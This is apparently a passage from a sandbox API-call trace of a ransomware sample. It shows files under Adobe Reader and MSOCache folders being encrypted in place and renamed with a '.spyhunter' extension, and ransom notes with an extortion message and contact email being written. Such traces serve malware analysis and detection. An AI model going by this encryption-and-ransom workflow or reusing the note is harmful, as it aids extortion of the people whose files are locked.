0x2c0000 [0180.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.694] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca.spyhunter") returned 109 [0180.694] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.fca"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.fca.spyhunter")) returned 1 [0180.695] GetProcessHeap () returned 0x2c0000 [0180.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.695] GetProcessHeap () returned 0x2c0000 [0180.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.695] GetProcessHeap () returned 0x2c0000 [0180.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee0be0 | out: hHeap=0x2c0000) returned 1 [0180.695] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1c0 | out: pbBuffer=0x57e1c0) returned 1 [0180.695] GetProcessHeap () returned 0x2c0000 [0180.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.695] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1b8*=0x30) returned 1 [0180.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd58.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd58.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.696] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd58.ths") returned 101 [0180.696] StrStrW (lpFirst="swd58.ths", lpSrch=".txt") returned 0x0 [0180.696] GetProcessHeap () returned 0x2c0000 [0180.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0180.696] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e17c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e17c*=0x2800, lpOverlapped=0x0) returned 1 [0180.775] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.775] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e17c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e17c*=0x2800, lpOverlapped=0x0) returned 1 [0180.775] GetProcessHeap () returned 0x2c0000 [0180.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0180.775] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.776] WriteFile (hFile=0x178, lpBuffer=0x57e1bc, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e17c, lpOverlapped=0x0) Thread: id = 6 os_tid = 0xac0 [0078.045] Sleep (dwMilliseconds=0x3e8) [0081.587] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ff10 | out: pbBuffer=0x248ff10) returned 1 [0081.870] GetProcessHeap () returned 0x2c0000 [0081.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0081.870] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248ff08*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248ff08*=0x30) returned 1 [0081.870] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0081.870] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.870] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0081.870] GetProcessHeap () returned 0x2c0000 [0081.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x329dc0 [0081.870] ReadFile (in: hFile=0xc8, lpBuffer=0x329dc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fecc, lpOverlapped=0x0 | out: lpBuffer=0x329dc0*, lpNumberOfBytesRead=0x248fecc*=0x16fc, lpOverlapped=0x0) returned 1 [0082.000] SetFilePointerEx (in: hFile=0xc8, liDistanceToMove=0xffffe904, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.000] WriteFile (in: hFile=0xc8, lpBuffer=0x329dc0*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x248fecc, lpOverlapped=0x0 | out: lpBuffer=0x329dc0*, lpNumberOfBytesWritten=0x248fecc*=0x16fc, lpOverlapped=0x0) returned 1 [0082.001] GetProcessHeap () returned 0x2c0000 [0082.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329dc0 | out: hHeap=0x2c0000) returned 1 [0082.001] SetFilePointerEx (in: hFile=0xc8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.001] WriteFile (in: hFile=0xc8, lpBuffer=0x248ff0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fecc, lpOverlapped=0x0 | out: lpBuffer=0x248ff0c*, lpNumberOfBytesWritten=0x248fecc*=0x4, lpOverlapped=0x0) returned 1 [0082.001] WriteFile (in: hFile=0xc8, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fecc, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fecc*=0x30, lpOverlapped=0x0) returned 1 [0082.001] CloseHandle (hObject=0xc8) returned 1 [0082.002] GetProcessHeap () returned 0x2c0000 [0082.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33cfe8 [0082.002] wnsprintfW (in: pszDest=0x33cfe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter") returned 86 [0082.003] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.spyhunter")) returned 1 [0082.003] GetProcessHeap () returned 0x2c0000 [0082.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33cfe8 | out: hHeap=0x2c0000) returned 1 [0082.003] GetProcessHeap () returned 0x2c0000 [0082.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0082.003] GetProcessHeap () returned 0x2c0000 [0082.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3204a8 | out: hHeap=0x2c0000) returned 1 [0082.004] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0082.005] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0082.005] WriteFile (in: hFile=0xc8, lpBuffer=0x248fe3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ff68, lpOverlapped=0x0 | out: lpBuffer=0x248fe3f*, lpNumberOfBytesWritten=0x248ff68*=0x127, lpOverlapped=0x0) returned 1 [0082.006] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0082.006] WriteFile (in: hFile=0xc8, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ff68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ff68*=0x2ac, lpOverlapped=0x0) returned 1 [0082.006] CloseHandle (hObject=0xc8) returned 1 [0082.006] GetProcessHeap () returned 0x2c0000 [0082.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327ec8 | out: hHeap=0x2c0000) returned 1 [0082.006] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ff08 | out: pbBuffer=0x248ff08) returned 1 [0082.006] GetProcessHeap () returned 0x2c0000 [0082.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0082.007] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248ff00*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248ff00*=0x30) returned 1 [0082.007] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0082.021] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0082.021] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0082.021] GetProcessHeap () returned 0x2c0000 [0082.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0082.021] ReadFile (in: hFile=0xd0, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fec4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x248fec4*=0x7c4, lpOverlapped=0x0) returned 1 [0082.086] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xfffff83c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.087] WriteFile (in: hFile=0xd0, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x248fec4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x248fec4*=0x7c4, lpOverlapped=0x0) returned 1 [0082.087] GetProcessHeap () returned 0x2c0000 [0082.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0082.088] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.088] WriteFile (in: hFile=0xd0, lpBuffer=0x248ff04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fec4, lpOverlapped=0x0 | out: lpBuffer=0x248ff04*, lpNumberOfBytesWritten=0x248fec4*=0x4, lpOverlapped=0x0) returned 1 [0082.088] WriteFile (in: hFile=0xd0, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fec4, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fec4*=0x30, lpOverlapped=0x0) returned 1 [0082.088] CloseHandle (hObject=0xd0) returned 1 [0082.091] GetProcessHeap () returned 0x2c0000 [0082.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0082.092] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter") returned 86 [0082.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.spyhunter")) returned 1 [0082.092] GetProcessHeap () returned 0x2c0000 [0082.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0082.092] GetProcessHeap () returned 0x2c0000 [0082.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0082.092] GetProcessHeap () returned 0x2c0000 [0082.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326518 | out: hHeap=0x2c0000) returned 1 [0082.092] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0082.093] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0082.093] WriteFile (in: hFile=0xd0, lpBuffer=0x248fe37*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ff60, lpOverlapped=0x0 | out: lpBuffer=0x248fe37*, lpNumberOfBytesWritten=0x248ff60*=0x127, lpOverlapped=0x0) returned 1 [0082.094] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0082.094] WriteFile (in: hFile=0xd0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ff60, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ff60*=0x2ac, lpOverlapped=0x0) returned 1 [0082.095] CloseHandle (hObject=0xd0) returned 1 [0082.095] GetProcessHeap () returned 0x2c0000 [0082.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3280a8 | out: hHeap=0x2c0000) returned 1 [0082.095] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ff00 | out: pbBuffer=0x248ff00) returned 1 [0082.095] GetProcessHeap () returned 0x2c0000 [0082.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0082.095] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fef8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fef8*=0x30) returned 1 [0082.095] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0082.096] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0082.096] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0082.096] GetProcessHeap () returned 0x2c0000 [0082.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0082.096] ReadFile (in: hFile=0xd0, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248febc, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x248febc*=0x750, lpOverlapped=0x0) returned 1 [0082.115] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xfffff8b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.116] WriteFile (in: hFile=0xd0, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x248febc, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x248febc*=0x750, lpOverlapped=0x0) returned 1 [0082.116] GetProcessHeap () returned 0x2c0000 [0082.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0082.117] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.117] WriteFile (in: hFile=0xd0, lpBuffer=0x248fefc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248febc, lpOverlapped=0x0 | out: lpBuffer=0x248fefc*, lpNumberOfBytesWritten=0x248febc*=0x4, lpOverlapped=0x0) returned 1 [0082.117] WriteFile (in: hFile=0xd0, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248febc, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248febc*=0x30, lpOverlapped=0x0) returned 1 [0082.117] CloseHandle (hObject=0xd0) returned 1 [0082.118] GetProcessHeap () returned 0x2c0000 [0082.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0082.119] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter") returned 86 [0082.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.spyhunter")) returned 1 [0082.147] GetProcessHeap () returned 0x2c0000 [0082.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0082.147] GetProcessHeap () returned 0x2c0000 [0082.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0082.147] GetProcessHeap () returned 0x2c0000 [0082.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3266e8 | out: hHeap=0x2c0000) returned 1 [0082.148] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fef8 | out: pbBuffer=0x248fef8) returned 1 [0082.148] GetProcessHeap () returned 0x2c0000 [0082.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0082.148] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fef0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fef0*=0x30) returned 1 [0082.148] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0082.151] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0082.151] StrStrW (lpFirst="ProjectMUI.xml", lpSrch=".txt") returned 0x0 [0082.151] GetProcessHeap () returned 0x2c0000 [0082.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32bdc0 [0082.152] ReadFile (in: hFile=0xd0, lpBuffer=0x32bdc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248feb4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesRead=0x248feb4*=0x5ac, lpOverlapped=0x0) returned 1 [0082.156] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.156] WriteFile (in: hFile=0xd0, lpBuffer=0x32bdc0*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x248feb4, lpOverlapped=0x0 | out: lpBuffer=0x32bdc0*, lpNumberOfBytesWritten=0x248feb4*=0x5ac, lpOverlapped=0x0) returned 1 [0082.157] GetProcessHeap () returned 0x2c0000 [0082.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bdc0 | out: hHeap=0x2c0000) returned 1 [0082.157] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.157] WriteFile (in: hFile=0xd0, lpBuffer=0x248fef4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248feb4, lpOverlapped=0x0 | out: lpBuffer=0x248fef4*, lpNumberOfBytesWritten=0x248feb4*=0x4, lpOverlapped=0x0) returned 1 [0082.157] WriteFile (in: hFile=0xd0, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248feb4, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248feb4*=0x30, lpOverlapped=0x0) returned 1 [0082.157] CloseHandle (hObject=0xd0) returned 1 [0082.160] GetProcessHeap () returned 0x2c0000 [0082.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0082.160] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.spyhunter") returned 91 [0082.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.spyhunter")) returned 1 [0082.161] GetProcessHeap () returned 0x2c0000 [0082.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0082.161] GetProcessHeap () returned 0x2c0000 [0082.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0082.161] GetProcessHeap () returned 0x2c0000 [0082.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327fb8 | out: hHeap=0x2c0000) returned 1 [0082.161] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fef8 | out: pbBuffer=0x248fef8) returned 1 [0082.161] GetProcessHeap () returned 0x2c0000 [0082.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0082.161] 